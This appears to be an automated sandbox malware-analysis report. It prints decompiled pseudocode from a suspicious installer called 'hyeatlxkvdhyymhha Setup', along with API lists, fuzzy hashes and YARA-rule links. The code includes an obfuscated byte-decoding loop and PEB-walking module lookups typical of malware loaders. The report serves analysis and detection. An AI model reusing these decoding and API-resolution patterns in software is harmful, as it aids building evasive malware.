						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x00000095;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t326 - 1) & 0x000000ff) << 0x00000001;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^  *(_t326 - 8);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0x9b;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^  *(_t326 - 8);
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t326 - 1) & 0x000000ff) << 0x00000007;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0x44;
						 *(_t326 - 1) =  ~( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t326 - 1) & 0x000000ff) << 0x00000002;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) - 0xf9;
						 *(_t326 - 1) =  *(_t326 - 1) & 0x000000ff ^ 0x00000063;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t326 - 1) & 0x000000ff) << 0x00000007;
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *(_t326 - 1) =  !( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) + 0x9f;
						 *(_t326 - 1) =  ~( *(_t326 - 1) & 0x000000ff);
						 *(_t326 - 1) = ( *(_t326 - 1) & 0x000000ff) +  *(_t326 - 8);
						 *((char*)( *((intOrPtr*)(_t326 + 8)) +  *(_t326 - 8))) =  *(_t326 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t326 + 8));
					L4:
				}
			}




                                            0x72915cf1
                                            0x72915cf1
                                            0x72915cf1
                                            0x72915cf5
                                            0x72915cf8
                                            0x72915cfe
                                            0x72915d04
                                            0x72915d0c
                                            0x72915d18
                                            0x72915d2b
                                            0x72915d34
                                            0x72915d40
                                            0x72915d49
                                            0x72915d52
                                            0x72915d5c
                                            0x72915d68
                                            0x72915d72
                                            0x72915d85
                                            0x72915d91
                                            0x72915d9d
                                            0x72915da6
                                            0x72915db0
                                            0x72915db9
                                            0x72915dc5
                                            0x72915dce
                                            0x72915dd8
                                            0x72915de2
                                            0x72915dec
                                            0x72915df8
                                            0x72915e02
                                            0x72915e0b
                                            0x72915e15
                                            0x72915e1f
                                            0x72915e31
                                            0x72915e3d
                                            0x72915e47
                                            0x72915e51
                                            0x72915e5a
                                            0x72915e66
                                            0x72915e70
                                            0x72915e7a
                                            0x72915e84
                                            0x72915e8e
                                            0x72915e9a
                                            0x72915eac
                                            0x72915eb6
                                            0x72915ec0
                                            0x72915ed3
                                            0x72915edc
                                            0x72915ee5
                                            0x72915eef
                                            0x72915efb
                                            0x72915f0d
                                            0x72915f17
                                            0x72915f23
                                            0x72915f2d
                                            0x72915f36
                                            0x72915f48
                                            0x72915f52
                                            0x72915f5b
                                            0x72915f64
                                            0x72915f6e
                                            0x72915f81
                                            0x72915f8d
                                            0x72915f97
                                            0x72915fa9
                                            0x72915fb3
                                            0x72915fbc
                                            0x72915fc8
                                            0x72915fd1
                                            0x72915fdb
                                            0x72915fe7
                                            0x00000000
                                            0x72915fe7
                                            0x72915fee
                                            0x72915ff4
                                            0x00000000
                                            0x72915ff4

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f806c989f0812c069dd7137cf0c8434aa9dbd86850b6f47db23ba10dfb2a9095
                                            • Instruction ID: 7f8a23762a69c533a43071f916433115579b752ad4b3a1b74de9570b7d470039
                                            • Opcode Fuzzy Hash: f806c989f0812c069dd7137cf0c8434aa9dbd86850b6f47db23ba10dfb2a9095
                                            • Instruction Fuzzy Hash: 6FB1045485D2EDADDB06CBF945603FCBFB04E2A102F4845DAE0E5E6283C53A934EDB25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729158FE, Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                            • Instruction ID: bf583d4b3bde4e1c047159c38403c2fc368f94305f9949b6df929af38eef80ff
                                            • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                            • Instruction Fuzzy Hash: E311A771A1010EFFC710DBAEC48496DF7FDEB45664B954055E805D3218E7309E41D652
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729159EE, Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                            • Instruction ID: fe4c02cc203314c23d54083e86a47c517d50aa1534c534dc4f06d056f4039458
                                            • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                            • Instruction Fuzzy Hash: 2EE09A357A060AAFCB04CBADC981D25B3F8EB08320B164290FC16C73E0EA34EE00DA51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 72915A2C, Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E72915A2C(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E729158FE( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}






                                            0x72915a38
                                            0x72915a3a
                                            0x72915a3d
                                            0x72915a3f
                                            0x72915a4d
                                            0x72915a51
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x72915a53
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction ID: 38a470009cba9b491b7b68864ae3dc6bbf41fe68a1a4b36ab1cdb8aba0c6c451
                                            • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction Fuzzy Hash: 5FE08C32361615EFC361CA1EC5C0D42F3EDEB8C6B571A486AE89AD3750C674FC05CA51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729159AF, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E729159AF() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                            0x729159c2

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403FCB, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x5fd5fe
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x5fbaf8
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x5f5d20
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















                                            0x00403fdb
                                            0x00404101
                                            0x0040415d
                                            0x00404161
                                            0x00404238
                                            0x0040423a
                                            0x0040423a
                                            0x00404240
                                            0x00404240
                                            0x00404243
                                            0x00000000
                                            0x0040424a
                                            0x0040416f
                                            0x00404171
                                            0x0040417b
                                            0x00404186
                                            0x00404189
                                            0x0040418c
                                            0x00404197
                                            0x0040419a
                                            0x004041a1
                                            0x004041af
                                            0x004041c7
                                            0x004041da
                                            0x004041ea
                                            0x004041ec
                                            0x004041ec
                                            0x004041a1
                                            0x004041f6
                                            0x00000000
                                            0x00404201
                                            0x00404205
                                            0x00404216
                                            0x00404216
                                            0x0040421c
                                            0x0040422a
                                            0x0040422a
                                            0x00000000
                                            0x0040422e
                                            0x004041f6
                                            0x0040410c
                                            0x00000000
                                            0x00404120
                                            0x00404126
                                            0x0040412c
                                            0x00000000
                                            0x00000000
                                            0x00404151
                                            0x00404153
                                            0x00404158
                                            0x00000000
                                            0x00404158
                                            0x0040410c
                                            0x00403fe1
                                            0x00403fe4
                                            0x00403fe9
                                            0x00403feb
                                            0x00403ffa
                                            0x00403ffa
                                            0x00403ffc
                                            0x00404001
                                            0x00404004
                                            0x00404006
                                            0x0040400b
                                            0x00404014
                                            0x0040401a
                                            0x00404026
                                            0x00404029
                                            0x00404032
                                            0x00404037
                                            0x0040403a
                                            0x0040403f
                                            0x00404056
                                            0x0040405d
                                            0x00404070
                                            0x00404073
                                            0x00404088
                                            0x0040408a
                                            0x0040408f
                                            0x00404094
                                            0x00404099
                                            0x00404099
                                            0x004040a8
                                            0x004040b7
                                            0x004040b9
                                            0x004040cf
                                            0x004040de
                                            0x004040e0
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: ]_$N$TclpOwkq$open
                                            • API String ID: 3615053054-1118705061
                                            • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                            • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                            • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                            • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x5f5d20
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "hyeatlxkvdhyymhha Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0xe009e
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                            0x0040100a
                                            0x00401039
                                            0x00401047
                                            0x0040104d
                                            0x00401051
                                            0x0040105b
                                            0x00401061
                                            0x00401064
                                            0x004010f3
                                            0x00401089
                                            0x0040108c
                                            0x004010a6
                                            0x004010bd
                                            0x004010cc
                                            0x004010cf
                                            0x004010d5
                                            0x004010d9
                                            0x004010e4
                                            0x004010ed
                                            0x004010ef
                                            0x004010ef
                                            0x00401100
                                            0x00401105
                                            0x0040110d
                                            0x00401110
                                            0x00401112
                                            0x00401118
                                            0x0040111f
                                            0x00401126
                                            0x00401130
                                            0x00401142
                                            0x00401156
                                            0x00401160
                                            0x00401165
                                            0x00401165
                                            0x00401110
                                            0x0040116e
                                            0x00000000
                                            0x00401178
                                            0x00401010
                                            0x00401013
                                            0x00401015
                                            0x00401019
                                            0x0040101f
                                            0x0040101f
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32 ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32 ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,hyeatlxkvdhyymhha Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: ]_$F$hyeatlxkvdhyymhha Setup
                                            • API String ID: 941294808-3543299408
                                            • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                            • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                            • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                            • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405915, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x5f5d20
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                            0x0040591b
                                            0x00405922
                                            0x00405926
                                            0x0040592f
                                            0x00405933
                                            0x00405a72
                                            0x00405a72
                                            0x00000000
                                            0x00405a72
                                            0x00405933
                                            0x0040593f
                                            0x00405955
                                            0x0040597d
                                            0x00405988
                                            0x0040598c
                                            0x004059ac
                                            0x004059ae
                                            0x004059b3
                                            0x004059bd
                                            0x004059ca
                                            0x004059cf
                                            0x004059d4
                                            0x004059d8
                                            0x00000000
                                            0x00000000
                                            0x004059e7
                                            0x004059e9
                                            0x004059f6
                                            0x004059fa
                                            0x00405a6b
                                            0x00405a6c
                                            0x00000000
                                            0x00405a16
                                            0x00405a23
                                            0x00405a88
                                            0x00405a8f
                                            0x00405a36
                                            0x00405a36
                                            0x00405a38
                                            0x00405a41
                                            0x00405a4c
                                            0x00405a5e
                                            0x00405a65
                                            0x00000000
                                            0x00405a65
                                            0x00405a91
                                            0x00405a92
                                            0x00405a97
                                            0x00405a99
                                            0x00405aa6
                                            0x00405aa6
                                            0x00405aaa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405a9b
                                            0x00405a9b
                                            0x00405a9e
                                            0x00405aa1
                                            0x00405aa2
                                            0x00000000
                                            0x00405a9b
                                            0x00405a2e
                                            0x00405a33
                                            0x00000000
                                            0x00405a33
                                            0x004059fa
                                            0x00405957
                                            0x00405962
                                            0x0040596b
                                            0x0040596f
                                            0x00000000
                                            0x00000000
                                            0x0040596f
                                            0x00405a7c

                                            APIs
                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                            • GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
                                            • GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
                                            • wsprintfA.USER32 ref: 004059A6
                                            • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                            • GlobalFree.KERNEL32 ref: 00405A65
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                              • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
